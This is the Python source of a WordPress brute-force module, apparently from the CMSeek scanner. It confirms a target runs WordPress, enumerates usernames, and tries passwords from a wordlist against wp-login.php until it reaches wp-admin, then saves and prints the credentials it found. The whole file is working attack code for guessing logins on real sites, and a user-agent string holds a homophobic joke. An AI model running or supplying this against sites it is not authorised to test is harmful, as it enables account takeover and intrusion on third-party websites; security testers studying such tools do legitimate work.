1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67 68 69 70 71 72 73 74 75 76 77 78 79 80 81 82 83 84 85 86 87 88 89 90
| import cmseekdb.basic as cmseek
import cmseekdb.sc as source # Contains function to detect cms from source code
import cmseekdb.header as header # Contains function to detect CMS from gathered http headers
import deepscans.wp.userenum as wp_user_enum
import multiprocessing ## Let's speed things up a lil bit (actually a hell lot faster) shell we?
from functools import partial ## needed somewhere :/
import sys
import cmseekdb.generator as generator
def start():
cmseek.clearscreen()
cmseek.banner("WordPress Bruteforce Module")
url = cmseek.targetinp("") # input('Enter Url: ')
cmseek.info("Checking for WordPress")
bsrc = cmseek.getsource(url, cmseek.randomua('thiscanbeanythingasfarasnowletitbewhatilovethemost'))
if bsrc[0] != '1':
# print(bsrc[1])
cmseek.error("Could not get target source, CMSeek is quitting")
cmseek.handle_quit()
else:
## Parse generator meta tag
parse_generator = generator.parse(bsrc[1])
ga = parse_generator[0]
ga_content = parse_generator[1]
try1 = generator.scan(ga_content)
if try1[0] == '1' and try1[1] == 'wp':
wpcnf = '1'
else:
try2 = source.check(bsrc[1], url)
if try2[0] == '1' and try2[1] == 'wp':
wpcnf = '1'
else:
wpcnf = '0'
if wpcnf != '1':
print(bsrc[1])
cmseek.error('Could not confirm WordPress... CMSeek is quitting')
cmseek.handle_quit()
else:
cmseek.success("WordPress Confirmed... Checking for WordPress login form")
wploginsrc = cmseek.getsource(url + '/wp-login.php', cmseek.randomua('thatsprettygay'))
if wploginsrc[0] == '1' and '<form' in wploginsrc[1]:
cmseek.success("Login form found.. Detecting Username For Bruteforce")
wpparamuser = []
uenum = wp_user_enum.start('wp', url, cmseek.randomua('r'), '0', bsrc[1])
usernamesgen = uenum[0]
wpparamuser = uenum[1]
if wpparamuser == []:
customuser = input("[~] CMSeek could not enumerate usernames, enter username if you know any: ")
if customuser == "":
cmseek.error("No user found, CMSeek is quitting")
else:
wpparamuser.append(customuser)
wpbruteusers = set(wpparamuser)
for user in wpbruteusers:
passfound = '0'
print('\n')
cmseek.info("Bruteforcing User: " + cmseek.bold + user + cmseek.cln)
with open("wordlist/passwords.txt", "r") as pwd_file:
passwords = pwd_file.read().split('\n')
passwords.insert(0, user)
passwords.insert(0, user[::-1])
for password in passwords:
print(password)
if password != '' and password != '\n':
sys.stdout.write('[*] Testing Password: ')
sys.stdout.write('%s\r\r' % password)
sys.stdout.flush()
cursrc = cmseek.wpbrutesrc(url, user, password)
if 'wp-admin' in str(cursrc[3]):
cmseek.success('Password found!')
print(" |\n |--[username]--> " + cmseek.bold + user + cmseek.cln + "\n |\n |--[password]--> " + cmseek.bold + password + cmseek.cln + "\n |")
cmseek.success('Enjoy The Hunt!')
cmseek.savebrute(url,url + '/wp-login.php',user,password)
passfound = '1'
break
else:
continue
break
if passfound == '0':
cmseek.error('\n\nCould Not find Password!')
print('\n\n')
else:
cmseek.error("Couldn't find login form... CMSeeK is quitting")
# print(wploginsrc[1])
cmseek.handle_quit() |
Partager